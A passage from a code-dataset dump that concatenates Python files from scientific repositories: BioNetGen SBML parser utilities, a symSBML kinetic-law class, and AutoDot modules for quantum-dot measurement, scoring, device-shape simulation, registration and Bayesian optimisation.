parser = argparse.ArgumentParser(description='SBML to BNGL translator')
parser.add_argument('-s','--settings',type=str,help='settings file')
parser.add_argument('-o','--output',type=str,help='output directory')
return parser
def loadFilesFromYAML(yamlFile):
with open(yamlFile,'r') as f:
yamlsettings = yaml.load(f)
print yamlsettings
return yamlsettings
def getEntropyMeasures(graphnames):
"""
batch process returns a distribution of metrics for fileset <graphnames>
"""
futures = []
workers = mp.cpu_count()-1
results = pandas.DataFrame()
with concurrent.futures.ProcessPoolExecutor(max_workers=workers) as executor:
for gidx in range(len(graphnames)):
futures.append(executor.submit(getGraphEntropy,graphnames[gidx],'species'))
for future in concurrent.futures.as_completed(futures,timeout=3600):
partialResults = future.result()
row = partialResults['graphname'].split('/')[-1]
column = partialResults['graphname'].split('/')[-3]
results = results.set_value(row,column + '_wiener',partialResults['wiener'][0])
results = results.set_value(row,column + '_entropy',partialResults['wiener'][1])
results = results.set_value(row,column + '_ccentropy',partialResults['centropy'])
results = results.set_value(row,column + '_nconn',partialResults['measures'][0])
results = results.set_value(row,column + '_nprocess',partialResults['graphstats'][0])
results = results.set_value(row,column + '_nspecies',partialResults['graphstats'][1])
results = results.set_value(row,column + '_nedges',partialResults['graphstats'][2])
return results
if __name__ == "__main__":
parser = defineConsole()
namespace = parser.parse_args()
if namespace.settings != None:
settings = loadFilesFromYAML(namespace.settings)
graphnames = settings['inputfiles']
outputdirectory = namespace.output
outputfile = 'entropy_{0}.h5'.format(namespace.settings.split('/')[-1].split('.')[-2])
else:
graphnames = getFiles('egfr/collapsed_contact','gml')
outputdirectory = 'egfr'
outputfile = 'entropy_test.h5'
#bngfile = 'egfr_net.bngl'
#createGMLFiles('egfr',options)
nodeTypes = ['species','process']
results = getEntropyMeasures(graphnames)
results.to_hdf(os.path.join(outputdirectory,outputfile),'entropy')
#raise Exception
```
#### File: BioNetGen-2.2.6-stable/SBMLparser/updateDistribution.py
```python
from os import listdir
import os.path
import shutil
import json
import argparse
import os
def defineConsole():
parser = argparse.ArgumentParser(description='SBMLparser file copy script')
parser.add_argument('-c','--copy',action='store_true',help='copy files from the main distro')
parser.add_argument('-r','--remove',action='store_true',help='remove files from this directory')
return parser
fileList = []
def resource_path(relative_path):
base_path = os.path.abspath(".")
convertedPath = os.path.normpath(os.path.join(base_path, relative_path))
return convertedPath
def clean_directory():
'''
with open('fileList.json','r') as f:
onlyfiles = json.load(f)
for fileName in onlyfiles:
try:
os.remove(fileName)
except OSError:
continue
'''
shutil.rmtree(os.path.join('.','SBMLparser'))
def update_directory():
srcDirectory = resource_path(os.path.join('..','..','parsers','SBMLparser','SBMLparser'))
'''
with open('fileList.json','r') as f:
onlyfiles = json.load(f)
#onlyfiles = [ f for f in listdir('./' + directory) if os.path.isfile(os.path.join('./' + directory,f)) ]
configFiles = [ f for f in listdir(os.path.join('.','config')) if os.path.isfile(os.path.join('.','config',f)) ]
#onlyNotFiles =[ f for f in listdir('./' + directory) if not isfile(join('./' + directory,f)) ]
originalFiles = listdir(srcDirectory)
print onlyfiles
for element in onlyfiles:
if element in originalFiles:
try:
shutil.copy(os.path.join(srcDirectory, element), '.')
except:
continue
for element in configFiles:
shutil.copy(os.path.join(srcDirectory,'config',element), os.path.join('.','config'))
'''
configFiles = [ f for f in listdir(os.path.join('.','config')) if os.path.isfile(os.path.join('.','config',f)) ]
for element in configFiles:
shutil.copy(os.path.join(srcDirectory,'config',element), os.path.join('.','config'))
try:
shutil.copytree(os.path.join(srcDirectory), 'SBMLparser')
except OSError:
print('SBMLparser directory already exists')
if __name__ == "__main__":
parser = defineConsole()
namespace = parser.parse_args()
if namespace.copy:
update_directory()
elif namespace.remove:
clean_directory()
``` |
{
"source": "joseph-hellerstein/symSBML-deprecated",
"score": 3
} |
#### File: symSBML-deprecated/symSBML/kinetic_law.py
```python
from src.common import constants as cn
from src.common import util
from src.common import exceptions
from src.common import msgs
import collections
import numpy as np
import re
MAX_RECURSION = 5
class KineticLaw(object):
def __init__(self, libsbml_kinetics, reaction, function_definitions=None):
"""
:param libsbml.KineticLaw libsbml_kinetics:
:param function_definitions list-FunctionDefinition:
"""
# libsbml object for kinetics
self.libsbml_kinetics = libsbml_kinetics
# String version of chemical formula
self.formula = self.libsbml_kinetics.getFormula()
# Parameters and chemical species
self.symbols = self._getSymbols()
# Reaction for the kinetics law
self.reaction = reaction
# Expanded kinetic formula (remove embedded functions)
if function_definitions is None:
self.expanded_formula = None
else:
self.expandFormula(function_definitions)
self.expression_formula = None # valid symPy expression string
def __repr__(self):
return self.formula
def expandFormula(self, function_definitions):
"""
Expands the kinetics formula, replacing function definitions
with their body.
Parameters
----------
function_definitions: list-FunctionDefinition
"""
self.expanded_formula = self._expandFormula(self.formula, function_definitions)
def mkSymbolExpression(self, function_definitions):
"""
Creates a string that can be processed by sympy.
Parameters
-------
function_definitions: list-FunctionDefinition
Returns
-------
str
"""
if self.expanded_formula is None:
self.expandFormula(function_definitions)
self.expression_formula = str(self.expanded_formula)
self.expression_formual.replace('^','**')
@staticmethod
def _expandFormula(expansion, function_definitions,
num_recursion=0):
"""
Expands the kinetics formula, replacing function definitions
with their body.
Parameters
----------
expansion: str
expansion of the kinetic law
function_definitions: list-FunctionDefinition
num_recursion: int
Returns
-------
str
"""
if num_recursion > MAX_RECURSION:
return expansion
done = True
for fd in function_definitions:
# Find the function calls
calls = re.findall(r'{}\(.*?\)'.format(fd.id), expansion)
if len(calls) == 0:
continue
done = False
for call in calls:
# Find argument call. Ex: '(a, b)'
call_arguments = re.findall(r'\(.*?\)', call)[0]
call_arguments = call_arguments.strip()
call_arguments = call_arguments[1:-1] # Eliminate parentheses
arguments = call_arguments.split(',')
arguments = [a.strip() for a in arguments]
body = str(fd.body)
for formal_arg, call_arg in zip(fd.argument_names, arguments):
body = body.replace(formal_arg, call_arg)
expansion = expansion.replace(call, body)
if not done:
return KineticLaw._expandFormula(expansion, function_definitions,
num_recursion=num_recursion+1)
return expansion
def _getSymbols(self):
"""
Finds the parameters and species names for the
kinetics law. Exposing this information requires
a recursive search of the parse tree for the
kinetics expression.
:return list-str:
"""
global cur_depth
MAX_DEPTH = 20
cur_depth = 0
def augment(ast_node, result):
global cur_depth
cur_depth += 1
if cur_depth > MAX_DEPTH:
raise exceptions.BadKineticsMath(self.reaction.id)
for idx in range(ast_node.getNumChildren()):
child_node = ast_node.getChild(idx)
if child_node.getName() is None:
additions = augment(child_node, result)
result.extend(additions)
else:
if child_node.isFunction():
additions = augment(child_node, result)
result.extend(additions)
else:
result.append(child_node.getName())
return result
ast_node = self.libsbml_kinetics.getMath()
if ast_node.getName() is None:
result = []
else:
result = [ast_node.getName()]
return augment(ast_node, result)
``` |
{
"source": "josephhic/AutoDot",
"score": 2
} |
#### File: AutoDot/Investigation/condition_functions.py
```python
import scipy.signal as signal
import pickle
import numpy as np
from .scoring.Last_score import final_score_cls
from skimage.feature import blob_log
import time
def mock_peak_check(anchor,minc,maxc,configs,**kwags):
a = configs.get('a',None)
b = configs.get('b',None)
verb = configs.get('verbose',False)
if a is None and b is None:
prob = configs.get('prob',0.5)
c_peak = np.random.uniform(0,1)<prob
if verb: print(c_peak)
return c_peak, c_peak, None
lb, ub = np.minimum(a,b), np.maximum(a,b)
c_peak = np.all(anchor<ub) and np.all(anchor>lb)
if verb: print(c_peak)
return c_peak, c_peak, None
def mock_score_func(anchor,minc,maxc,configs,**kwags):
a = np.array(configs.get('target',[-500,-500]))
score = 100/ np.linalg.norm(a-anchor)
print(score)
return score, False, None
def check_nothing(trace,minc,maxc,configs,**kwags):
output = configs.get('output',False)
return output, output, None
def peak_check(trace,minc,maxc,configs,**kwags):
prominence = configs['prominance']
#norm settings
offset = minc
maxval = maxc
#peak detector settings
height = configs.get('height',0.0178)
trace_norm=trace.copy()-offset
trace_norm[trace_norm<0]=0
trace_norm = (trace_norm)/((maxval-offset)) #normalize the current amplitude
peaks, data = signal.find_peaks(trace_norm,prominence=prominence,height=height)
return len(peaks)>=configs['minimum'], len(peaks)>=configs['minimum'], peaks
def reduce_then_clf_2dmap(data,minc,maxc,configs,**kwags):
dim_reduction_fname = configs['dim_reduction']
clf_fname = configs['clf']
with open(dim_reduction_fname,'rb') as drf:
dim_red = pickle.load(drf)
with open(clf_fname,'rb') as cf:
clf = pickle.load(cf)
X = normilise(data,configs['norm'],minc,maxc)
X_red = dim_red.transform(np.expand_dims(X,axis=0))
Y = np.squeeze(clf.predict(X_red))
return Y, Y, None
def last_score(data,minc,maxc,configs,**kwags):
fsc = final_score_cls(minc,maxc,configs['noise'],configs['segmentation_thresh'])
score = getattr(fsc,configs.get('mode','score'))(data,diff=configs.get('diff',1))
s_cond = False
print("Score: %f"%score)
return score, s_cond, None
def last_score_then_blob(data,minc,maxc,configs,**kwags):
fsc = final_score_cls(minc,maxc,configs['noise'],configs['segmentation_thresh'])
score = getattr(fsc,configs.get('mode','score'))(data,diff=configs.get('diff',1))
score_thresh = configs.get('score_thresh',None)
if score_thresh is None:
score_thresh = kwags.get('score_thresh')
print("Score: %f"%score)
blobs = blob_detect_rough(data,minc,maxc)
return score, score>score_thresh, {"kwags":{"blobs":blobs,"size_last":configs['size'],"res_last":configs['res']}}
def clf_then_blob(data,minc,maxc,configs,**kwags):
data = normilise(data,configs['norm'],minc,maxc)
clf_fname = configs['clf']
with open(clf_fname,'rb') as cf:
clf = pickle.load(cf)
Y = np.squeeze(clf.predict(np.expand_dims(data,axis=0)))
if Y:
pass
return
def count_above_thresh(data,minc,maxc,configs,**kwags):
split_thresh = configs.get('split_thresh',0.0001)
count_required = configs.get('count_required',0.0001)
data_above = data[data>split_thresh]
count_ratio = data_above.size/data.size
blobs = blob_detect_rough(data,minc,maxc)
return count_ratio<count_required,count_ratio<count_required,{"kwags":{"cr":count_ratio,"blobs":blobs,"size_last":configs['size'],"res_last":configs['res']}}
def blob_detect_rough(data,minc,maxc):
blobs = blob_log(normilise(data,'device_domain',minc,maxc),min_sigma=2,threshold=0.0001)[:,:2]
return np.array([blobs[:,1],blobs[:,0]])
def normilise(data,norm_type,minc,maxc):
if norm_type is None:
return data
if isinstance(norm_type,list):
min_val = norm_type[0]
max_val = norm_type[1]
elif norm_type == 'device_domain':
min_val = minc
max_val = maxc
else:
min_val = data.min()
max_val = data.max()
data_norm = np.copy(data)
data_norm[data_norm>max_val] = max_val
data_norm[data_norm<min_val] = min_val
data_norm = (data_norm - min_val)/(max_val-min_val)
return data_norm
def plot_image_and_blobs(data,blobs):
blob = blobs[:,:2]
blob = np.array([blob[:,1],blob[:,0]])
plt.imshow(data)
for i in range(blob.shape[-1]):
plt.scatter(*blob[:,i])
plt.show()
```
#### File: AutoDot/Investigation/measurement_functions.py
```python
import numpy as np
import matplotlib.pyplot as plt
import time
def do_nothing(jump,measure,anchor_vals,configs,**kwags):
pause = configs.get('pause',0)
time.sleep(pause)
return None
def mock_measurement(jump,measure,anchor_vals,configs,**kwags):
pause = configs.get('pause',0)
time.sleep(pause)
return anchor_vals
def do1dcombo(jump,measure,anchor_vals,configs,**kwags):
size = configs.get('size',128)
direction = np.array(configs.get('direction',[1]*len(anchor_vals)))
res = configs.get('res',128)
delta_volt = np.linspace(0,size,res)
anchor_vals = np.array(anchor_vals)
trace = combo1d(jump,measure,anchor_vals,delta_volt,direction)
if configs.get('plot',False):
plt.plot(delta_volt,trace)
plt.show()
return trace
def do2d(jump,measure,anchor_vals,configs,**kwags):
bound = kwags.get('bound',configs['size'])
res = configs.get('res',20)
direction = np.array(configs.get('direction',[1]*len(anchor_vals)))
iter_vals = [None]*2
for i in range(2):
iter_vals[i] = np.linspace(0,bound[i],res)
iter_deltas = np.array(np.meshgrid(*iter_vals))
data = np.zeros([res,res])
for i in range(res):
for j in range(res):
params_c = anchor_vals + direction*iter_deltas[:,i,j]
jump(params_c)
data[i,j] = measure()
if configs.get('plot',False):
plt.imshow(data,cmap='bwr')
plt.show()
return data
def measure_random_blob(jump,measure,anchor_vals,configs,**kwags):
blobs = kwags['last_check'].get('blobs')
old_size = kwags['last_check'].get('size_last')
old_res = kwags['last_check'].get('res_last')
size = configs['size']
res = configs['res']
x_old = np.linspace(0,old_size[0],old_res)
y_old = np.linspace(0,old_size[1],old_res)
try:
random_blob_idx = np.random.choice(blobs.shape[-1])
random_blob = blobs[:,random_blob_idx]
except ValueError:
return None
random_blob = blobs[:,-1]
random_blob = np.array([x_old[int(random_blob[0])],y_old[int(random_blob[1])]])
anc_new = (anchor_vals - random_blob)+(size/2)
print(anc_new)
configs_new = {'size':[size,size],'res':res,'direction':[-1,-1]}
data = do2d(jump,measure,anc_new,configs_new,**kwags)
if configs.get('plot',False):
plt.imshow(data,cmap='bwr')
plt.show()
return data
def do2_do2d(jump,measure,anchor_vals,configs,**kwags):
pygor = kwags.get('pygor')
if pygor is None:
raise ValueError("Pygor instance was not passed to investigation stage")
var_par = configs['var params']
assert len(var_par)==3
data = []
print(pygor.setvals(var_par[0]['keys'],var_par[0]['params']))
data += [do2d(jump,measure,anchor_vals,configs,**kwags)]
print(pygor.setvals(var_par[1]['keys'],var_par[1]['params']))
time.sleep(60)
data += [do2d(jump,measure,anchor_vals,configs,**kwags)]
print(pygor.setvals(var_par[2]['keys'],var_par[2]['params']))
time.sleep(60)
return np.array(data)
def combo1d(jump,measure,anc,deltas,dirs):
trace = np.zeros(len(deltas))
for i in range(len(deltas)):
params_c = anc + dirs*deltas[i]
jump(params_c)
trace[i] = measure()
return trace
```
#### File: Investigation/scoring/dot_score.py
```python
import numpy as np
import scipy.signal
from Pygor_new.measurement_functions import measurement_funcs as meas
def find_peaks(trace,prominence):
#norm settings
offset = -1.5e-10
maxval = 5e-10
noise_level = 1E-11
#peak detector settings
height = 0.0178
trace_norm=trace.copy()-offset
trace_norm[trace_norm<0]=0
trace_norm = (trace_norm)/((maxval-offset)) #normalize the current amplitude
peaks, data = scipy.signal.find_peaks(trace_norm,prominence=prominence,height=height)
return peaks
def dot_score_avg(coor, trace1,trace2,prominence):
peaks1_index = find_peaks(trace1,prominence)
peaks2_index = find_peaks(trace2,prominence)
peaks1_co = coor[peaks1_index] #relative coordinates of the peaks in trace 1
peaks2_co = coor[peaks2_index] #relative coordinates of the peaks in trace 2
diff1 = np.diff(peaks1_co)
diff2 = np.diff(peaks2_co)
if len(diff1)==0 or len(diff2)==0:
dist=np.nan
return dist
peak_avg1=np.convolve(peaks1_co,[0.5, 0.5],'valid')
peak_avg2=np.convolve(peaks2_co,[0.5, 0.5],'valid')
if len(diff1)>len(diff2):
while len(diff1)>len(diff2):
avg_score=[]
for num in peak_avg1:
avg_score+=[min(abs(peak_avg2-num))]
max_avg_index=avg_score.index(max(avg_score))
diff1=np.delete(diff1,[max_avg_index])
peak_avg1=np.delete(peak_avg1,[max_avg_index])
if len(diff2)>len(diff1):
while len(diff2)>len(diff1):
peak_avg1=np.convolve(peaks1_co,[0.5, 0.5],'valid')
peak_avg2=np.convolve(peaks1_co,[0.5, 0.5],'valid')
avg_score=[]
for num in peak_avg2:
avg_score+=[min(abs(peak_avg1-num))]
max_avg_index=avg_score.index(max(avg_score))
diff2=np.delete(diff2,[max_avg_index])
peak_avg2=np.delete(peak_avg2,[max_avg_index])
dist = np.linalg.norm(diff1-diff2)/np.sqrt(diff1.size)
return dist
def dot_score_weight(coor, trace1,trace2,prominence,weight):
peaks1_index = find_peaks(trace1,prominence)
peaks2_index = find_peaks(trace2,prominence)
peaks1_co = coor[peaks1_index] #relative coordinates of the peaks in trace 1
peaks2_co = coor[peaks2_index] #relative coordinates of the peaks in trace 2
if len(peaks1_co)<3 or len(peaks2_co)<3:
extra_score=1
return extra_score
else:
peak_avg1=np.convolve(peaks1_co,[0.5, 0.5],'valid')
peak_avg2=np.convolve(peaks2_co,[0.5, 0.5],'valid')
dist_avg1=(np.mean(np.diff(peak_avg1)))
dist_avg2=(np.mean(np.diff(peak_avg2)))
extra_score=2-(abs(dist_avg1-dist_avg2)/max(dist_avg1,dist_avg2))
return extra_score*weight
def execute_score(coor, traces_dir1, traces_dir2, prominence=0.02,weight=1.5):
scores1=[]
scores2=[]
#Scores based on distance difference
for j in range(0,len(traces_dir1),2): #calculate the scores for the the traces in direction 1 and direction 2
score1=dot_score_avg(coor,traces_dir1[j],traces_dir1[j+1],prominence)
score2=dot_score_avg(coor,traces_dir2[j],traces_dir2[j+1],prominence)
print(score1,score2)
#Scores based on extra periodicity weight factor
score_extra1=dot_score_weight(coor,traces_dir1[j],traces_dir1[j+1],prominence,weight)
score_extra2=dot_score_weight(coor,traces_dir2[j],traces_dir2[j+1],prominence,weight)
print(score_extra1,score_extra2)
scores1+=[score1*score_extra1]
scores2+=[score2*score_extra2]
if np.isnan(scores1):
scores1 = [0]
if np.isnan(scores2):
scores2 = [0]
print(scores1,scores2)
#nx is the number of x pixels
#ny is the number of y pixels
tot_score = scores1[0] + scores2[0]
return tot_score
def smooth_trace(traces,pad=(1,1),conv=3):
s_traces = []
for trace in traces:
s_traces += [np.convolve(np.lib.pad(trace,pad,'edge'),np.ones((conv,))/conv,mode='valid')]
return s_traces
def dot_score_sample(pygor,params,gates=["c3","c4","c5","c6","c7","c8","c9","c10"],v_gates=["c5","c9"],l=100,s=20,res=100):
def safe_shuffle(varz,vals):
pygor.server.config_control("dac",{'set_settletime': 0.03,'set_shuttle': True})
pygor.setvals(varz,vals)
pygor.server.config_control("dac",{'set_settletime': 0.01,'set_shuttle': False})
safe_shuffle(gates,params)
v1_val,v2_val=pygor.getvals(["c5","c9"])
l_step = (l/2)/np.sqrt(2)
s_step = (s/2)/np.sqrt(2)
tracepoints = np.zeros([4,2])
endpoints = np.zeros([4,2])
traces = np.zeros([tracepoints.shape[0],100])
tracepoints[0,:] = [v1_val +l_step +s_step ,v2_val +l_step -s_step]
endpoints[0,:] = [v1_val -l_step +s_step, v2_val -l_step -s_step]
tracepoints[1,:] = [v1_val -l_step -s_step, v2_val -l_step +s_step]
endpoints[1,:] = [v1_val +l_step -s_step, v2_val +l_step +s_step]
tracepoints[2,:] = [v1_val -l_step +s_step, v2_val +l_step +s_step]
endpoints[2,:] = [v1_val +l_step +s_step, v2_val -l_step +s_step]
tracepoints[3,:] = [v1_val +l_step -s_step, v2_val -l_step -s_step]
endpoints[3,:] = [v1_val -l_step -s_step, v2_val +l_step -s_step]
for i in range(tracepoints.shape[0]):
safe_shuffle(v_gates,tracepoints[i])
traces[i,:] = meas.do1d_combo(pygor,v_gates,tracepoints[i],endpoints[i],res).data
safe_shuffle(gates,params)
x_vals = np.linspace(0,l,res)
return traces,x_vals,tracepoints,endpoints
def dot_score(pygor,params,gates=["c3","c4","c5","c6","c7","c8","c9","c10"],v_gates=["c5","c9"],l=100,s=20,res=100):
traces,coor,tracepoints,endpoints = dot_score_sample(pygor,params,gates,v_gates,l,s,res)
s_traces = smooth_trace(traces)
s1 = execute_score(coor,s_traces[0:2],s_traces[2:4])
return s1
```
#### File: AutoDot/Playground/shapes.py
```python
import numpy as np
import scipy.stats
def L2_norm(x):
return np.sqrt(np.sum(np.square(x), axis=-1))
class Circle(object):
def __init__(self, ndim, r=1000, origin=0.0):
if np.isscalar(origin):
self.origin = origin * np.ones(ndim)
else:
self.origin = np.array(origin)
self.r = r
self.ndim = ndim
def __call__(self, x):
return L2_norm(np.array(x) - self.origin) <= self.r
class Box(object):
def __init__(self, ndim, a=-1000, b=0):
if np.isscalar(a):
a = a * np.ones(ndim)
if np.isscalar(b):
b = b * np.ones(ndim)
a = np.array(a)
b = np.array(b)
if len(a) != ndim or len(b) != ndim:
raise ValueError('Wrong dimensions for defining a box')
if all(a < b):
self.lb, self.ub = a, b
elif all(a > b):
self.lb, self.ub = b, a
else:
raise ValueError('Wrong points for defining a box')
self.ndim = ndim
def __call__(self, x):
x = np.array(x)
inside = np.logical_and(np.all(x > self.lb[np.newaxis, :], axis=-1),
np.all(x < self.ub[np.newaxis, :], axis=-1))
return inside
class Leakage(object):
def __init__(self, ndim, th_leak=-500, idx=0):
self.th_leak = th_leak
self.leak_gate = idx
def __call__(self, x):
x = np.array(x)
leak = x[:, self.leak_gate] > self.th_leak
return leak
# change
class Convexhull(object):
def __init__(self, ndim, points=[-1000, 0, [-1000, 0], [0, -1000]]):
# points: 2D array (num_points x ndim)
for i, point in enumerate(points):
if np.isscalar(point):
points[i] = point * np.ones(ndim)
points = np.array(points)
from scipy.spatial import Delaunay
self.hull = Delaunay(points)
self.ndim = points.shape[1]
def __call__(self, x):
return self.hull.find_simplex(x) >= 0
class Crosstalk_box(Convexhull):
def __init__(self, ndim, a=-1500, b=1500, a_prime=-1000):
if np.isscalar(a):
a = a * np.ones(ndim)
if np.isscalar(b):
b = b * np.ones(ndim)
if np.isscalar(a_prime):
a_prime = a_prime * np.ones(ndim)
a = np.array(a)
b = np.array(b)
if np.any(a > b): raise ValueError('a should be less than b')
vertices = np.array(np.meshgrid(*list(zip(a, b)))).T.reshape(-1, ndim)
# Replace the first vertex with b
vertices[0] = a_prime
from scipy.spatial import Delaunay
self.hull = Delaunay(vertices)
self.ndim = vertices.shape[1]
class Crosstalk_matrix_box:
def __init__(self, ndim, mean=0, stdev=1.2, max=[-1200, -1200, -1200]):
"""
Creates a device hypersurface for a device with ndim (barrier) gates
Crosstalk between gates is defined by crosstalk matrix (define_crosstalk_matrix)
This matrix is randomly generated using gaussian from mean, stdev provided in init (from config).
"""
self.mean = mean
self.stdev = stdev
self.ndim = ndim
self.max = np.array(max)
# self.matrix = self.define_crosstalk_matrix(self.ndim, self.mean, self.stdev)
print("Matrix not randomly generated. Change in Playground/shapes.py")
self.matrix = np.array([[1.00000000e+00, 2.25765077e-01, 1.25099259e-03, 8.05792338e-08,
9.45403448e-13],
[2.66750478e-01, 1.00000000e+00, 3.26841059e-01, 4.12765083e-04,
5.35202839e-08],
[2.03396254e-03, 1.85905049e-01, 1.00000000e+00, 1.43947865e-01,
7.78828027e-04],
[8.45614836e-08, 2.73164211e-03, 2.09218832e-01, 1.00000000e+00,
2.73003173e-01],
[4.61575699e-13, 1.89962878e-08, 3.65315897e-04, 3.68532330e-01,
1.00000000e+00]])
def __call__(self, x):
x = np.array(x)
check = self.matrix.dot(x.T) > self.max[:, np.newaxis]
shape = np.all(check[:, :], axis=0)
return shape
def define_crosstalk_matrix(self, ndim, mean, stdev):
dims = (ndim, ndim)
gaussian = scipy.stats.norm(mean, stdev)
maximum = gaussian.pdf(mean)
def f(i, j):
# Create array of random values (0, 0.3) to add to crosstalk matrix
randoms = np.random.random(dims) * 0.3
# Add to index difference (i - j) to maintain gaussian
# np.sign so that they shift away from mean not just towards higher value
difference = i - j
return gaussian.pdf(difference + (randoms * np.sign(j - i))) / maximum
matrix = np.fromfunction(lambda i, j: f(i, j), dims, dtype='float32')
# Plot the matrix that represents the crosstalk. Blues cmap to make it similar to the Volk qubyte paper
import matplotlib.pyplot as plt
plt.matshow(matrix, cmap='Blues')
return matrix
```
#### File: AutoDot/Registration/perfect_hypercube.py
```python
import numpy as np
def generate_points_on_hypercube(nsamples,origin,poffs,p=None,uvecs=None):
if uvecs is None:
epsilon = []
bounds = []
for i in range(len(origin)):
origin_c = np.copy(origin)
poffs_c = np.copy(poffs)
origin_c[i] = poffs_c[i]
bounds += [origin_c]
print(origin_c,poffs_c)
epsilon += [np.linalg.norm(origin_c-poffs_c)]
epsilon = np.array(epsilon)
if p is None:
p = epsilon/epsilon.sum()
print(p)
points = []
for i in range(nsamples):
face = np.random.choice(len(origin),p=p)
points+=[np.random.uniform(bounds[face],poffs)]
return np.array(points)
def clean_pointset(pointset):
pointset = np.copy(pointset)
for point in pointset:
toremove = np.where(np.all(np.less(pointset,point),axis=1))[0]
pointset = np.delete(pointset,toremove,axis=0)
#for point in pointset:
# print(np.less(pointset,point))
# print(np.where(np.logical_all(pointset<point)))
return pointset
if __name__ == "__main__":
p = generate_points_on_hypercube(200,[120,40],[-200,-300],None)
print(p)
import matplotlib.pyplot as plt
plt.scatter(*p.T)
plt.show()
```
#### File: AutoDot/Registration/simple_hyper_surf_test.py
```python
from functools import partial
import matplotlib.pyplot as plt
from registration_core import notranslation_affine_registration,simple_affine_registration,deformable_registration
import numpy as np
def visualize(iteration, error, X, Y):
min_l = np.minimum(X.shape[0],Y.shape[0])
abs_error = np.linalg.norm(X[:min_l]-Y[:min_l],axis=-1)
print(iteration,error,np.sum(abs_error)/min_l)
#diffs = X[:min_l]-Y[:min_l]
#print(np.std(diffs,axis=0))
#surface_points = np.load("data//moving_B2t2_cd2.npy")
surface_points_target = np.load("data//save_Florian_redo//vols_poff_prev.npy")
surface_points = np.load("data//save_Florian_redo//vols_poff_after.npy")#[:,[0,1,2,3,4,6,7]]
#surface_points_target = np.load("data//target_B2t2_cd1.npy")
#surface_points = np.load("data//moving_B1t2_b1.npy")
#surface_points_target = np.load("data//target_B1t2_b2.npy")
#surface_points = np.load("data//moving_B1t2_b1.npy")
#surface_points_target = np.load("data//target_B2t2_cd1.npy")
#"""
min_l = np.minimum(len(surface_points<-1990),len(surface_points_target))
usefull = np.logical_and(~np.any(surface_points<-1990,axis=1)[:min_l],~np.any(surface_points_target<-1990,axis=1)[:min_l])
surface_points = surface_points[:min_l][usefull]
surface_points_target = surface_points_target[:min_l][usefull]
#"""
print(surface_points.shape,surface_points_target.shape)
callback = partial(visualize)
reg = notranslation_affine_registration(**{ 'X': np.copy(surface_points_target), 'Y': np.copy(surface_points)})
reg.register(callback)
device_change = reg.B-np.diag(np.ones(7))
m_cmap = np.abs(device_change).max()
m_cmap = 0.3
plt.imshow(device_change.T,vmin=-m_cmap,vmax=m_cmap,cmap='PuOr')
xlabels = ['$V_1$', '$V_2$', '$V_3$', '$V_4$', '$V_5$', '$V_7$', '$V_8$']
ylabels = ['$VT_1$', '$VT_2$', '$VT_3$', '$VT_4$', '$VT_5$', '$VT_7$', '$VT_8$']
xlabs = np.linspace(0,6,7)
plt.xticks(xlabs,xlabels)
plt.yticks(xlabs,ylabels)
plt.colorbar()
plt.savefig("B1t2_transformation.svg")
plt.show()
np.save("vols_poff_transformed_prevb1b2.npy",reg.TY)
np.save("vols_poff_prevb1b2.npy",reg.Y)
np.save("vols_poff_afterb1b2.npy",reg.X)
print(np.linalg.det(reg.B),m_cmap)
#np.save("data/registrated_pointset_B1toB2.npy",reg.TY)
```
#### File: AutoDot/Sampling/BO_common.py
```python
from functools import partial
from multiprocessing import Pool
import numpy as np
from scipy.stats import norm # for calculating normpdf, normcdf
from scipy import optimize # for optimisation
from pyDOE import lhs # Latin hypercube sampling
#import scipydirect
# for minimisation
def EI( best_prev, mean_x, std_x, min_obj=True , dmdx=None, dsdx=None ):
#diff = best_prev - mean_x
#return diff*norm.cdf(diff/std_x) + std_x*norm.pdf(diff/std_x)
diff = best_prev - mean_x
if min_obj is False:
diff = -diff # max problem
z = (best_prev - mean_x)/std_x
phi, Phi = norm.pdf(z), norm.cdf(z)
if dmdx is not None and dsdx is not None:
#https://github.com/SheffieldML/GPyOpt/blob/master/GPyOpt/acquisitions/EI.py
if min_obj:
dEIdx = dsdx * phi - Phi * dmdx
else:
dEIdx = dsdx * phi + Phi * dmdx
else:
dEIdx = None
return std_x*(z*Phi + phi), dEIdx
def augmented_EI( best_prev, mean_x, std_x, std_noise, min_obj=True, dmdx=None, dsdx=None ):
var_sum = np.square(std_noise) + np.square(std_x)
EI, _ = EI( best_prev, mean_x, std_x, min_obj, dmdx, dsdx)
aug_EI = EI* (1.0 - std_noise/np.sqrt(var_sum))
# WARNING: gradient is not impledmented yet
return aug_EI, None
def sample_lhs_basic(ndim, num_samples):
# returns a num_samples x ndim array
lhd = lhs(ndim, samples=num_samples)
return lhd
def sample_lhs_bounds(lb, ub, num_samples):
# returns a num_samples x ndim array
if lb.ndim != 1 or ub.ndim != 1:
raise ValueError('Bounds should be 1-dim. vectors.')
if lb.size != ub.size:
raise ValueError('Length of lb should be same with ub.')
if np.any(lb > ub):
raise ValueError('lb cannot be larger than ub.')
ndim = ub.size
diff = ub - lb
lhd = sample_lhs_basic(ndim, num_samples)
lhd = lhd * diff + lb
return lhd
# TODO: check trust-constr params
def optimize_trust_constr(x0, f, lb, ub, const_func=None, maxiter=200):
dim = lb.size
bounds = [(lb[i],ub[i]) for i in range(dim)]
# constraint: const_func(x) == 0
const = optimize.NonlinearConstraint(const_func, 0.0, 0.0)
res = optimize.minimize(f, x0=x0, method='trust-constr', jac='3-point', hess='3-point', bounds=bounds, constraints=const)
result_x = np.atleast_1d(res.x)
result_fx = np.atleast_1d(res.fun)
return result_x, result_fx
def optimize_lbfgs(x0, f, lb, ub, const_func=None, maxiter=200):
if const_func is not None:
f_augmented = lambda x : f(x) + 10000.*const_func(x)
else:
f_augmented = f
dim = lb.size
bounds = [(lb[i],ub[i]) for i in range(dim)]
res = optimize.fmin_l_bfgs_b(f,x0=x0,bounds=bounds,approx_grad=True, maxiter=maxiter)
d = res[2]
if d['task'] == b'ABNORMAL_TERMINATION_IN_LNSRCH':
result_x = np.atleast_1d(x0)
else:
result_x = np.atleast_1d(res[0])
result_fx = f(result_x)
const_val = const_func(result_x)
converged = True
if d['warnflag'] != 0:
converged = False
disp = True
if converged is False and disp is True:
if d['warnflag'] == 1:
print('Too many function evaluations or iterations')
elif d['warnflag'] == 2:
print('Stopped for another reason')
print('x: ', result_x, ', fx: ', result_fx)
print('gradient: ', d['grad'], ', constraint: ', const_val )
return result_x, result_fx, {'converged':converged, 'const_val':const_val}
def optimize_Largrange(x0, f, lb, ub, const_func, maxiter=200):
dim = lb.size
bounds = [(lb[i],ub[i]) for i in range(dim)] + [(0.0, np.inf)]
f_augmented = lambda x : f(x[:-1]) + x[-1]*const_func(x[:-1])
x0 = np.append(x0, 1.0) # initial lambda
